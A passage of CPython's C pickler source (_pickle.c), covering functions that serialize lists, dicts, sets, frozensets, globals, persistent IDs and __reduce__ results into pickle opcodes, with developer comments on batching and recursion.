/* Fetch and save up to BATCHSIZE items */
while (obj) {
if (save(self, obj, 0) < 0)
goto error;
Py_CLEAR(obj);
n += 1;
if (n == BATCHSIZE)
break;
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
break;
}
}
if (_Pickler_Write(self, &appends_op, 1) < 0)
goto error;
} while (n == BATCHSIZE);
return 0;
error:
Py_XDECREF(firstitem);
Py_XDECREF(obj);
return -1;
}
/* This is a variant of batch_list() above, specialized for lists (with no
* support for list subclasses). Like batch_list(), we batch up chunks of
* MARK item item ... item APPENDS
* opcode sequences. Calling code should have arranged to first create an
* empty list, or list-like object, for the APPENDS to operate on.
* Returns 0 on success, -1 on error.
*
* This version is considerably faster than batch_list(), if less general.
*
* Note that this only works for protocols > 0.
*/
static int
batch_list_exact(PicklerObject *self, PyObject *obj)
{
PyObject *item = NULL;
Py_ssize_t this_batch, total;
const char append_op = APPEND;
const char appends_op = APPENDS;
const char mark_op = MARK;
assert(obj != NULL);
assert(self->proto > 0);
assert(PyList_CheckExact(obj));
if (PyList_GET_SIZE(obj) == 1) {
item = PyList_GET_ITEM(obj, 0);
if (save(self, item, 0) < 0)
return -1;
if (_Pickler_Write(self, &append_op, 1) < 0)
return -1;
return 0;
}
/* Write in batches of BATCHSIZE. */
total = 0;
do {
this_batch = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (total < PyList_GET_SIZE(obj)) {
item = PyList_GET_ITEM(obj, total);
if (save(self, item, 0) < 0)
return -1;
total++;
if (++this_batch == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &appends_op, 1) < 0)
return -1;
} while (total < PyList_GET_SIZE(obj));
return 0;
}
static int
save_list(PicklerObject *self, PyObject *obj)
{
char header[3];
Py_ssize_t len;
int status = 0;
if (self->fast && !fast_save_enter(self, obj))
goto error;
/* Create an empty list. */
if (self->bin) {
header[0] = EMPTY_LIST;
len = 1;
}
else {
header[0] = MARK;
header[1] = LIST;
len = 2;
}
if (_Pickler_Write(self, header, len) < 0)
goto error;
/* Get list length, and bow out early if empty. */
if ((len = PyList_Size(obj)) < 0)
goto error;
if (memo_put(self, obj) < 0)
goto error;
if (len != 0) {
/* Materialize the list elements. */
if (PyList_CheckExact(obj) && self->proto > 0) {
if (Py_EnterRecursiveCall(" while pickling an object"))
goto error;
status = batch_list_exact(self, obj);
Py_LeaveRecursiveCall();
} else {
PyObject *iter = PyObject_GetIter(obj);
if (iter == NULL)
goto error;
if (Py_EnterRecursiveCall(" while pickling an object")) {
Py_DECREF(iter);
goto error;
}
status = batch_list(self, iter);
Py_LeaveRecursiveCall();
Py_DECREF(iter);
}
}
if (0) {
error:
status = -1;
}
if (self->fast && !fast_save_leave(self, obj))
status = -1;
return status;
}
/* iter is an iterator giving (key, value) pairs, and we batch up chunks of
* MARK key value ... key value SETITEMS
* opcode sequences. Calling code should have arranged to first create an
* empty dict, or dict-like object, for the SETITEMS to operate on.
* Returns 0 on success, <0 on error.
*
* This is very much like batch_list(). The difference between saving
* elements directly, and picking apart two-tuples, is so long-winded at
* the C level, though, that attempts to combine these routines were too
* ugly to bear.
*/
static int
batch_dict(PicklerObject *self, PyObject *iter)
{
PyObject *obj = NULL;
PyObject *firstitem = NULL;
int i, n;
const char mark_op = MARK;
const char setitem_op = SETITEM;
const char setitems_op = SETITEMS;
assert(iter != NULL);
if (self->proto == 0) {
/* SETITEMS isn't available; do one at a time. */
for (;;) {
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
return -1;
break;
}
if (!PyTuple_Check(obj) || PyTuple_Size(obj) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
return -1;
}
i = save(self, PyTuple_GET_ITEM(obj, 0), 0);
if (i >= 0)
i = save(self, PyTuple_GET_ITEM(obj, 1), 0);
Py_DECREF(obj);
if (i < 0)
return -1;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
return -1;
}
return 0;
}
/* proto > 0: write in batches of BATCHSIZE. */
do {
/* Get first item */
firstitem = PyIter_Next(iter);
if (firstitem == NULL) {
if (PyErr_Occurred())
goto error;
/* nothing more to add */
break;
}
if (!PyTuple_Check(firstitem) || PyTuple_Size(firstitem) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
goto error;
}
/* Try to get a second item */
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
/* Only one item to write */
if (save(self, PyTuple_GET_ITEM(firstitem, 0), 0) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 1), 0) < 0)
goto error;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
goto error;
Py_CLEAR(firstitem);
break;
}
/* More than one item to write */
/* Pump out MARK, items, SETITEMS. */
if (_Pickler_Write(self, &mark_op, 1) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 0), 0) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 1), 0) < 0)
goto error;
Py_CLEAR(firstitem);
n = 1;
/* Fetch and save up to BATCHSIZE items */
while (obj) {
if (!PyTuple_Check(obj) || PyTuple_Size(obj) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
goto error;
}
if (save(self, PyTuple_GET_ITEM(obj, 0), 0) < 0 ||
save(self, PyTuple_GET_ITEM(obj, 1), 0) < 0)
goto error;
Py_CLEAR(obj);
n += 1;
if (n == BATCHSIZE)
break;
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
break;
}
}
if (_Pickler_Write(self, &setitems_op, 1) < 0)
goto error;
} while (n == BATCHSIZE);
return 0;
error:
Py_XDECREF(firstitem);
Py_XDECREF(obj);
return -1;
}
/* This is a variant of batch_dict() above that specializes for dicts, with no
* support for dict subclasses. Like batch_dict(), we batch up chunks of
* MARK key value ... key value SETITEMS
* opcode sequences. Calling code should have arranged to first create an
* empty dict, or dict-like object, for the SETITEMS to operate on.
* Returns 0 on success, -1 on error.
*
* Note that this currently doesn't work for protocol 0.
*/
static int
batch_dict_exact(PicklerObject *self, PyObject *obj)
{
PyObject *key = NULL, *value = NULL;
int i;
Py_ssize_t dict_size, ppos = 0;
const char mark_op = MARK;
const char setitem_op = SETITEM;
const char setitems_op = SETITEMS;
assert(obj != NULL && PyDict_CheckExact(obj));
assert(self->proto > 0);
dict_size = PyDict_GET_SIZE(obj);
/* Special-case len(d) == 1 to save space. */
if (dict_size == 1) {
PyDict_Next(obj, &ppos, &key, &value);
if (save(self, key, 0) < 0)
return -1;
if (save(self, value, 0) < 0)
return -1;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
return -1;
return 0;
}
/* Write in batches of BATCHSIZE. */
do {
i = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (PyDict_Next(obj, &ppos, &key, &value)) {
if (save(self, key, 0) < 0)
return -1;
if (save(self, value, 0) < 0)
return -1;
if (++i == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &setitems_op, 1) < 0)
return -1;
if (PyDict_GET_SIZE(obj) != dict_size) {
PyErr_Format(
PyExc_RuntimeError,
"dictionary changed size during iteration");
return -1;
}
} while (i == BATCHSIZE);
return 0;
}
static int
save_dict(PicklerObject *self, PyObject *obj)
{
PyObject *items, *iter;
char header[3];
Py_ssize_t len;
int status = 0;
assert(PyDict_Check(obj));
if (self->fast && !fast_save_enter(self, obj))
goto error;
/* Create an empty dict. */
if (self->bin) {
header[0] = EMPTY_DICT;
len = 1;
}
else {
header[0] = MARK;
header[1] = DICT;
len = 2;
}
if (_Pickler_Write(self, header, len) < 0)
goto error;
if (memo_put(self, obj) < 0)
goto error;
if (PyDict_GET_SIZE(obj)) {
/* Save the dict items. */
if (PyDict_CheckExact(obj) && self->proto > 0) {
/* We can take certain shortcuts if we know this is a dict and
not a dict subclass. */
if (Py_EnterRecursiveCall(" while pickling an object"))
goto error;
status = batch_dict_exact(self, obj);
Py_LeaveRecursiveCall();
} else {
_Py_IDENTIFIER(items);
items = _PyObject_CallMethodId(obj, &PyId_items, NULL);
if (items == NULL)
goto error;
iter = PyObject_GetIter(items);
Py_DECREF(items);
if (iter == NULL)
goto error;
if (Py_EnterRecursiveCall(" while pickling an object")) {
Py_DECREF(iter);
goto error;
}
status = batch_dict(self, iter);
Py_LeaveRecursiveCall();
Py_DECREF(iter);
}
}
if (0) {
error:
status = -1;
}
if (self->fast && !fast_save_leave(self, obj))
status = -1;
return status;
}
static int
save_set(PicklerObject *self, PyObject *obj)
{
PyObject *item;
int i;
Py_ssize_t set_size, ppos = 0;
Py_hash_t hash;
const char empty_set_op = EMPTY_SET;
const char mark_op = MARK;
const char additems_op = ADDITEMS;
if (self->proto < 4) {
PyObject *items;
PyObject *reduce_value;
int status;
items = PySequence_List(obj);
if (items == NULL) {
return -1;
}
reduce_value = Py_BuildValue("(O(O))", (PyObject*)&PySet_Type, items);
Py_DECREF(items);
if (reduce_value == NULL) {
return -1;
}
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
if (_Pickler_Write(self, &empty_set_op, 1) < 0)
return -1;
if (memo_put(self, obj) < 0)
return -1;
set_size = PySet_GET_SIZE(obj);
if (set_size == 0)
return 0; /* nothing to do */
/* Write in batches of BATCHSIZE. */
do {
i = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (_PySet_NextEntry(obj, &ppos, &item, &hash)) {
if (save(self, item, 0) < 0)
return -1;
if (++i == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &additems_op, 1) < 0)
return -1;
if (PySet_GET_SIZE(obj) != set_size) {
PyErr_Format(
PyExc_RuntimeError,
"set changed size during iteration");
return -1;
}
} while (i == BATCHSIZE);
return 0;
}
static int
save_frozenset(PicklerObject *self, PyObject *obj)
{
PyObject *iter;
const char mark_op = MARK;
const char frozenset_op = FROZENSET;
if (self->fast && !fast_save_enter(self, obj))
return -1;
if (self->proto < 4) {
PyObject *items;
PyObject *reduce_value;
int status;
items = PySequence_List(obj);
if (items == NULL) {
return -1;
}
reduce_value = Py_BuildValue("(O(O))", (PyObject*)&PyFrozenSet_Type,
items);
Py_DECREF(items);
if (reduce_value == NULL) {
return -1;
}
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
iter = PyObject_GetIter(obj);
if (iter == NULL) {
return -1;
}
for (;;) {
PyObject *item;
item = PyIter_Next(iter);
if (item == NULL) {
if (PyErr_Occurred()) {
Py_DECREF(iter);
return -1;
}
break;
}
if (save(self, item, 0) < 0) {
Py_DECREF(item);
Py_DECREF(iter);
return -1;
}
Py_DECREF(item);
}
Py_DECREF(iter);
/* If the object is already in the memo, this means it is
recursive. In this case, throw away everything we put on the
stack, and fetch the object back from the memo. */
if (PyMemoTable_Get(self->memo, obj)) {
const char pop_mark_op = POP_MARK;
if (_Pickler_Write(self, &pop_mark_op, 1) < 0)
return -1;
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
if (_Pickler_Write(self, &frozenset_op, 1) < 0)
return -1;
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
static int
fix_imports(PyObject **module_name, PyObject **global_name)
{
PyObject *key;
PyObject *item;
PickleState *st = _Pickle_GetGlobalState();
key = PyTuple_Pack(2, *module_name, *global_name);
if (key == NULL)
return -1;
item = PyDict_GetItemWithError(st->name_mapping_3to2, key);
Py_DECREF(key);
if (item) {
PyObject *fixed_module_name;
PyObject *fixed_global_name;
if (!PyTuple_Check(item) || PyTuple_GET_SIZE(item) != 2) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING values "
"should be 2-tuples, not %.200s",
Py_TYPE(item)->tp_name);
return -1;
}
fixed_module_name = PyTuple_GET_ITEM(item, 0);
fixed_global_name = PyTuple_GET_ITEM(item, 1);
if (!PyUnicode_Check(fixed_module_name) ||
!PyUnicode_Check(fixed_global_name)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING values "
"should be pairs of str, not (%.200s, %.200s)",
Py_TYPE(fixed_module_name)->tp_name,
Py_TYPE(fixed_global_name)->tp_name);
return -1;
}
Py_CLEAR(*module_name);
Py_CLEAR(*global_name);
Py_INCREF(fixed_module_name);
Py_INCREF(fixed_global_name);
*module_name = fixed_module_name;
*global_name = fixed_global_name;
return 0;
}
else if (PyErr_Occurred()) {
return -1;
}
item = PyDict_GetItemWithError(st->import_mapping_3to2, *module_name);
if (item) {
if (!PyUnicode_Check(item)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_IMPORT_MAPPING values "
"should be strings, not %.200s",
Py_TYPE(item)->tp_name);
return -1;
}
Py_INCREF(item);
Py_XSETREF(*module_name, item);
}
else if (PyErr_Occurred()) {
return -1;
}
return 0;
}
static int
save_global(PicklerObject *self, PyObject *obj, PyObject *name)
{
PyObject *global_name = NULL;
PyObject *module_name = NULL;
PyObject *module = NULL;
PyObject *parent = NULL;
PyObject *dotted_path = NULL;
PyObject *lastname = NULL;
PyObject *cls;
PickleState *st = _Pickle_GetGlobalState();
int status = 0;
_Py_IDENTIFIER(__name__);
_Py_IDENTIFIER(__qualname__);
const char global_op = GLOBAL;
if (name) {
Py_INCREF(name);
global_name = name;
}
else {
if (_PyObject_LookupAttrId(obj, &PyId___qualname__, &global_name) < 0)
goto error;
if (global_name == NULL) {
global_name = _PyObject_GetAttrId(obj, &PyId___name__);
if (global_name == NULL)
goto error;
}
}
dotted_path = get_dotted_path(module, global_name);
if (dotted_path == NULL)
goto error;
module_name = whichmodule(obj, dotted_path);
if (module_name == NULL)
goto error;
/* XXX: Change to use the import C API directly with level=0 to disallow
relative imports.
XXX: PyImport_ImportModuleLevel could be used. However, this bypasses
builtins.__import__. Therefore, _pickle, unlike pickle.py, will ignore
custom import functions (IMHO, this would be a nice security
feature). The import C API would need to be extended to support the
extra parameters of __import__ to fix that. */
module = PyImport_Import(module_name);
if (module == NULL) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: import of module %R failed",
obj, module_name);
goto error;
}
lastname = PyList_GET_ITEM(dotted_path, PyList_GET_SIZE(dotted_path)-1);
Py_INCREF(lastname);
cls = get_deep_attribute(module, dotted_path, &parent);
Py_CLEAR(dotted_path);
if (cls == NULL) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: attribute lookup %S on %S failed",
obj, global_name, module_name);
goto error;
}
if (cls != obj) {
Py_DECREF(cls);
PyErr_Format(st->PicklingError,
"Can't pickle %R: it's not the same object as %S.%S",
obj, module_name, global_name);
goto error;
}
Py_DECREF(cls);
if (self->proto >= 2) {
/* See whether this is in the extension registry, and if
* so generate an EXT opcode.
*/
PyObject *extension_key;
PyObject *code_obj; /* extension code as Python object */
long code; /* extension code as C value */
char pdata[5];
Py_ssize_t n;
extension_key = PyTuple_Pack(2, module_name, global_name);
if (extension_key == NULL) {
goto error;
}
code_obj = PyDict_GetItemWithError(st->extension_registry,
extension_key);
Py_DECREF(extension_key);
/* The object is not registered in the extension registry.
This is the most likely code path. */
if (code_obj == NULL) {
if (PyErr_Occurred()) {
goto error;
}
goto gen_global;
}
/* XXX: pickle.py doesn't check neither the type, nor the range
of the value returned by the extension_registry. It should for
consistency. */
/* Verify code_obj has the right type and value. */
if (!PyLong_Check(code_obj)) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: extension code %R isn't an integer",
obj, code_obj);
goto error;
}
code = PyLong_AS_LONG(code_obj);
if (code <= 0 || code > 0x7fffffffL) {
if (!PyErr_Occurred())
PyErr_Format(st->PicklingError, "Can't pickle %R: extension "
"code %ld is out of range", obj, code);
goto error;
}
/* Generate an EXT opcode. */
if (code <= 0xff) {
pdata[0] = EXT1;
pdata[1] = (unsigned char)code;
n = 2;
}
else if (code <= 0xffff) {
pdata[0] = EXT2;
pdata[1] = (unsigned char)(code & 0xff);
pdata[2] = (unsigned char)((code >> 8) & 0xff);
n = 3;
}
else {
pdata[0] = EXT4;
pdata[1] = (unsigned char)(code & 0xff);
pdata[2] = (unsigned char)((code >> 8) & 0xff);
pdata[3] = (unsigned char)((code >> 16) & 0xff);
pdata[4] = (unsigned char)((code >> 24) & 0xff);
n = 5;
}
if (_Pickler_Write(self, pdata, n) < 0)
goto error;
}
else {
gen_global:
if (parent == module) {
Py_INCREF(lastname);
Py_DECREF(global_name);
global_name = lastname;
}
if (self->proto >= 4) {
const char stack_global_op = STACK_GLOBAL;
if (save(self, module_name, 0) < 0)
goto error;
if (save(self, global_name, 0) < 0)
goto error;
if (_Pickler_Write(self, &stack_global_op, 1) < 0)
goto error;
}
else if (parent != module) {
PickleState *st = _Pickle_GetGlobalState();
PyObject *reduce_value = Py_BuildValue("(O(OO))",
st->getattr, parent, lastname);
if (reduce_value == NULL)
goto error;
status = save_reduce(self, reduce_value, NULL);
Py_DECREF(reduce_value);
if (status < 0)
goto error;
}
else {
/* Generate a normal global opcode if we are using a pickle
protocol < 4, or if the object is not registered in the
extension registry. */
PyObject *encoded;
PyObject *(*unicode_encoder)(PyObject *);
if (_Pickler_Write(self, &global_op, 1) < 0)
goto error;
/* For protocol < 3 and if the user didn't request against doing
so, we convert module names to the old 2.x module names. */
if (self->proto < 3 && self->fix_imports) {
if (fix_imports(&module_name, &global_name) < 0) {
goto error;
}
}
/* Since Python 3.0 now supports non-ASCII identifiers, we encode
both the module name and the global name using UTF-8. We do so
only when we are using the pickle protocol newer than version
3. This is to ensure compatibility with older Unpickler running
on Python 2.x. */
if (self->proto == 3) {
unicode_encoder = PyUnicode_AsUTF8String;
}
else {
unicode_encoder = PyUnicode_AsASCIIString;
}
encoded = unicode_encoder(module_name);
if (encoded == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeEncodeError))
PyErr_Format(st->PicklingError,
"can't pickle module identifier '%S' using "
"pickle protocol %i",
module_name, self->proto);
goto error;
}
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded),
PyBytes_GET_SIZE(encoded)) < 0) {
Py_DECREF(encoded);
goto error;
}
Py_DECREF(encoded);
if(_Pickler_Write(self, "\n", 1) < 0)
goto error;
/* Save the name of the module. */
encoded = unicode_encoder(global_name);
if (encoded == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeEncodeError))
PyErr_Format(st->PicklingError,
"can't pickle global identifier '%S' using "
"pickle protocol %i",
global_name, self->proto);
goto error;
}
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded),
PyBytes_GET_SIZE(encoded)) < 0) {
Py_DECREF(encoded);
goto error;
}
Py_DECREF(encoded);
if (_Pickler_Write(self, "\n", 1) < 0)
goto error;
}
/* Memoize the object. */
if (memo_put(self, obj) < 0)
goto error;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(module_name);
Py_XDECREF(global_name);
Py_XDECREF(module);
Py_XDECREF(parent);
Py_XDECREF(dotted_path);
Py_XDECREF(lastname);
return status;
}
static int
save_singleton_type(PicklerObject *self, PyObject *obj, PyObject *singleton)
{
PyObject *reduce_value;
int status;
reduce_value = Py_BuildValue("O(O)", &PyType_Type, singleton);
if (reduce_value == NULL) {
return -1;
}
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
static int
save_type(PicklerObject *self, PyObject *obj)
{
if (obj == (PyObject *)&_PyNone_Type) {
return save_singleton_type(self, obj, Py_None);
}
else if (obj == (PyObject *)&PyEllipsis_Type) {
return save_singleton_type(self, obj, Py_Ellipsis);
}
else if (obj == (PyObject *)&_PyNotImplemented_Type) {
return save_singleton_type(self, obj, Py_NotImplemented);
}
return save_global(self, obj, NULL);
}
static int
save_pers(PicklerObject *self, PyObject *obj)
{
PyObject *pid = NULL;
int status = 0;
const char persid_op = PERSID;
const char binpersid_op = BINPERSID;
pid = call_method(self->pers_func, self->pers_func_self, obj);
if (pid == NULL)
return -1;
if (pid != Py_None) {
if (self->bin) {
if (save(self, pid, 1) < 0 ||
_Pickler_Write(self, &binpersid_op, 1) < 0)
goto error;
}
else {
PyObject *pid_str;
pid_str = PyObject_Str(pid);
if (pid_str == NULL)
goto error;
/* XXX: Should it check whether the pid contains embedded
newlines? */
if (!PyUnicode_IS_ASCII(pid_str)) {
PyErr_SetString(_Pickle_GetGlobalState()->PicklingError,
"persistent IDs in protocol 0 must be "
"ASCII strings");
Py_DECREF(pid_str);
goto error;
}
if (_Pickler_Write(self, &persid_op, 1) < 0 ||
_Pickler_Write(self, PyUnicode_DATA(pid_str),
PyUnicode_GET_LENGTH(pid_str)) < 0 ||
_Pickler_Write(self, "\n", 1) < 0) {
Py_DECREF(pid_str);
goto error;
}
Py_DECREF(pid_str);
}
status = 1;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(pid);
return status;
}
static PyObject *
get_class(PyObject *obj)
{
PyObject *cls;
_Py_IDENTIFIER(__class__);
if (_PyObject_LookupAttrId(obj, &PyId___class__, &cls) == 0) {
cls = (PyObject *) Py_TYPE(obj);
Py_INCREF(cls);
}
return cls;
}
/* We're saving obj, and args is the 2-thru-5 tuple returned by the
* appropriate __reduce__ method for obj.
*/
static int
save_reduce(PicklerObject *self, PyObject *args, PyObject *obj)
{
PyObject *callable;
PyObject *argtup;
PyObject *state = NULL;
PyObject *listitems = Py_None;
PyObject *dictitems = Py_None;
PickleState *st = _Pickle_GetGlobalState();
Py_ssize_t size;
int use_newobj = 0, use_newobj_ex = 0;
const char reduce_op = REDUCE;
const char build_op = BUILD;
const char newobj_op = NEWOBJ;
const char newobj_ex_op = NEWOBJ_EX;
size = PyTuple_Size(args);
if (size < 2 || size > 5) {
PyErr_SetString(st->PicklingError, "tuple returned by "
"__reduce__ must contain 2 through 5 elements");
return -1;
}
if (!PyArg_UnpackTuple(args, "save_reduce", 2, 5,
&callable, &argtup, &state, &listitems, &dictitems))
return -1;
if (!PyCallable_Check(callable)) {
PyErr_SetString(st->PicklingError, "first item of the tuple "
"returned by __reduce__ must be callable");
return -1;
}
if (!PyTuple_Check(argtup)) {
PyErr_SetString(st->PicklingError, "second item of the tuple "
"returned by __reduce__ must be a tuple");
return -1;
}
if (state == Py_None)
state = NULL;
if (listitems == Py_None)
listitems = NULL;
else if (!PyIter_Check(listitems)) {
PyErr_Format(st->PicklingError, "fourth element of the tuple "
"returned by __reduce__ must be an iterator, not %s",
Py_TYPE(listitems)->tp_name);
return -1;
}
if (dictitems == Py_None)
dictitems = NULL;
else if (!PyIter_Check(dictitems)) {
PyErr_Format(st->PicklingError, "fifth element of the tuple "
"returned by __reduce__ must be an iterator, not %s",
Py_TYPE(dictitems)->tp_name);
return -1;
}
if (self->proto >= 2) {
PyObject *name;
_Py_IDENTIFIER(__name__);
if (_PyObject_LookupAttrId(callable, &PyId___name__, &name) < 0) {
return -1;
}
if (name != NULL && PyUnicode_Check(name)) {
_Py_IDENTIFIER(__newobj_ex__);
use_newobj_ex = _PyUnicode_EqualToASCIIId(
name, &PyId___newobj_ex__);
if (!use_newobj_ex) {
_Py_IDENTIFIER(__newobj__);
use_newobj = _PyUnicode_EqualToASCIIId(name, &PyId___newobj__);
}
}
Py_XDECREF(name);
}
if (use_newobj_ex) {
PyObject *cls;
PyObject *args;
PyObject *kwargs;
if (PyTuple_GET_SIZE(argtup) != 3) {
PyErr_Format(st->PicklingError,
"length of the NEWOBJ_EX argument tuple must be "
"exactly 3, not %zd", PyTuple_GET_SIZE(argtup));
return -1;
}
cls = PyTuple_GET_ITEM(argtup, 0);
if (!PyType_Check(cls)) {
PyErr_Format(st->PicklingError,
"first item from NEWOBJ_EX argument tuple must "
"be a class, not %.200s", Py_TYPE(cls)->tp_name);
return -1;
}
args = PyTuple_GET_ITEM(argtup, 1);
if (!PyTuple_Check(args)) {
PyErr_Format(st->PicklingError,
"second item from NEWOBJ_EX argument tuple must "
"be a tuple, not %.200s", Py_TYPE(args)->tp_name);
return -1;
}
kwargs = PyTuple_GET_ITEM(argtup, 2);
if (!PyDict_Check(kwargs)) {
PyErr_Format(st->PicklingError,
"third item from NEWOBJ_EX argument tuple must "
"be a dict, not %.200s", Py_TYPE(kwargs)->tp_name);
return -1;
}
if (self->proto >= 4) {
if (save(self, cls, 0) < 0 ||
save(self, args, 0) < 0 ||
save(self, kwargs, 0) < 0 ||
_Pickler_Write(self, &newobj_ex_op, 1) < 0) {
return -1;
}
}
else {
PyObject *newargs;
PyObject *cls_new;
Py_ssize_t i;
_Py_IDENTIFIER(__new__);
newargs = PyTuple_New(PyTuple_GET_SIZE(args) + 2);
if (newargs == NULL)
return -1;
cls_new = _PyObject_GetAttrId(cls, &PyId___new__);
if (cls_new == NULL) {
Py_DECREF(newargs);
return -1;
}
PyTuple_SET_ITEM(newargs, 0, cls_new);
Py_INCREF(cls);
PyTuple_SET_ITEM(newargs, 1, cls);
for (i = 0; i < PyTuple_GET_SIZE(args); i++) {
PyObject *item = PyTuple_GET_ITEM(args, i);
Py_INCREF(item);
PyTuple_SET_ITEM(newargs, i + 2, item);
}
callable = PyObject_Call(st->partial, newargs, kwargs);
Py_DECREF(newargs);
if (callable == NULL)
return -1;
newargs = PyTuple_New(0);
if (newargs == NULL) {
Py_DECREF(callable);
return -1;
}
if (save(self, callable, 0) < 0 ||
save(self, newargs, 0) < 0 ||
_Pickler_Write(self, &reduce_op, 1) < 0) {
Py_DECREF(newargs);
Py_DECREF(callable);
return -1;
}
Py_DECREF(newargs);
Py_DECREF(callable);
}
}
else if (use_newobj) {
PyObject *cls;
PyObject *newargtup;
PyObject *obj_class;
int p;
/* Sanity checks. */
if (PyTuple_GET_SIZE(argtup) < 1) {
PyErr_SetString(st->PicklingError, "__newobj__ arglist is empty");
return -1;
}
cls = PyTuple_GET_ITEM(argtup, 0);
if (!PyType_Check(cls)) {
PyErr_SetString(st->PicklingError, "args[0] from "
"__newobj__ args is not a type");
return -1;
}
if (obj != NULL) {
obj_class = get_class(obj);
p = obj_class != cls; /* true iff a problem */
Py_DECREF(obj_class);
if (p) {
PyErr_SetString(st->PicklingError, "args[0] from "
"__newobj__ args has the wrong class");
return -1;
}
}
/* XXX: These calls save() are prone to infinite recursion. Imagine
what happen if the value returned by the __reduce__() method of
some extension type contains another object of the same type. Ouch!
Here is a quick example, that I ran into, to illustrate what I
mean:
>>> import pickle, copyreg
>>> copyreg.dispatch_table.pop(complex)
>>> pickle.dumps(1+2j)
Traceback (most recent call last):
...
RecursionError: maximum recursion depth exceeded
Removing the complex class from copyreg.dispatch_table made the
__reduce_ex__() method emit another complex object:
>>> (1+1j).__reduce_ex__(2)
(<function __newobj__ at 0xb7b71c3c>,
(<class 'complex'>, (1+1j)), None, None, None)
Thus when save() was called on newargstup (the 2nd item) recursion
ensued. Of course, the bug was in the complex class which had a
broken __getnewargs__() that emitted another complex object. But,
the point, here, is it is quite easy to end up with a broken reduce
function. */
/* Save the class and its __new__ arguments. */
if (save(self, cls, 0) < 0)
return -1;
newargtup = PyTuple_GetSlice(argtup, 1, PyTuple_GET_SIZE(argtup));
if (newargtup == NULL)
return -1;
p = save(self, newargtup, 0);
Py_DECREF(newargtup);
if (p < 0)
return -1;
/* Add NEWOBJ opcode. */
if (_Pickler_Write(self, &newobj_op, 1) < 0)
return -1;
}
else { /* Not using NEWOBJ. */
if (save(self, callable, 0) < 0 ||
save(self, argtup, 0) < 0 ||
_Pickler_Write(self, &reduce_op, 1) < 0)
return -1;
}
/* obj can be NULL when save_reduce() is used directly. A NULL obj means
the caller do not want to memoize the object. Not particularly useful,
but that is to mimic the behavior save_reduce() in pickle.py when
obj is None. */
if (obj != NULL) {
/* If the object is already in the memo, this means it is
recursive. In this case, throw away everything we put on the
stack, and fetch the object back from the memo. */
if (PyMemoTable_Get(self->memo, obj)) {
const char pop_op = POP;
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else if (memo_put(self, obj) < 0)
return -1;
}
if (listitems && batch_list(self, listitems) < 0)
return -1;
if (dictitems && batch_dict(self, dictitems) < 0)
return -1;
if (state) {
if (save(self, state, 0) < 0 ||
_Pickler_Write(self, &build_op, 1) < 0)
return -1;
}
return 0;
}
static int
save(PicklerObject *self, PyObject *obj, int pers_save)
{
PyTypeObject *type;
PyObject *reduce_func = NULL;
PyObject *reduce_value = NULL;
int status = 0;
if (_Pickler_OpcodeBoundary(self) < 0)
return -1;
/* The extra pers_save argument is necessary to avoid calling save_pers()
on its returned object. */
if (!pers_save && self->pers_func) {
/* save_pers() returns:
-1 to signal an error;
0 if it did nothing successfully;
1 if a persistent id was saved.
*/
if ((status = save_pers(self, obj)) != 0)
return status;
}
type = Py_TYPE(obj);
/* The old cPickle had an optimization that used switch-case statement
dispatching on the first letter of the type name. This has was removed
since benchmarks shown that this optimization was actually slowing
things down. */
/* Atom types; these aren't memoized, so don't check the memo. */
if (obj == Py_None) {
return save_none(self, obj);
}
else if (obj == Py_False || obj == Py_True) {
return save_bool(self, obj);
}
else if (type == &PyLong_Type) {
return save_long(self, obj);
}
else if (type == &PyFloat_Type) {
return save_float(self, obj);
}
/* Check the memo to see if it has the object. If so, generate
a GET (or BINGET) opcode, instead of pickling the object
once again. */
if (PyMemoTable_Get(self->memo, obj)) {
return memo_get(self, obj);
}
if (type == &PyBytes_Type) {
return save_bytes(self, obj);
}
else if (type == &PyUnicode_Type) {
return save_unicode(self, obj);
}
/* We're only calling Py_EnterRecursiveCall here so that atomic
types above are pickled faster. */
if (Py_EnterRecursiveCall(" while pickling an object")) {
return -1;
}
if (type == &PyDict_Type) {
status = save_dict(self, obj);
goto done;
}
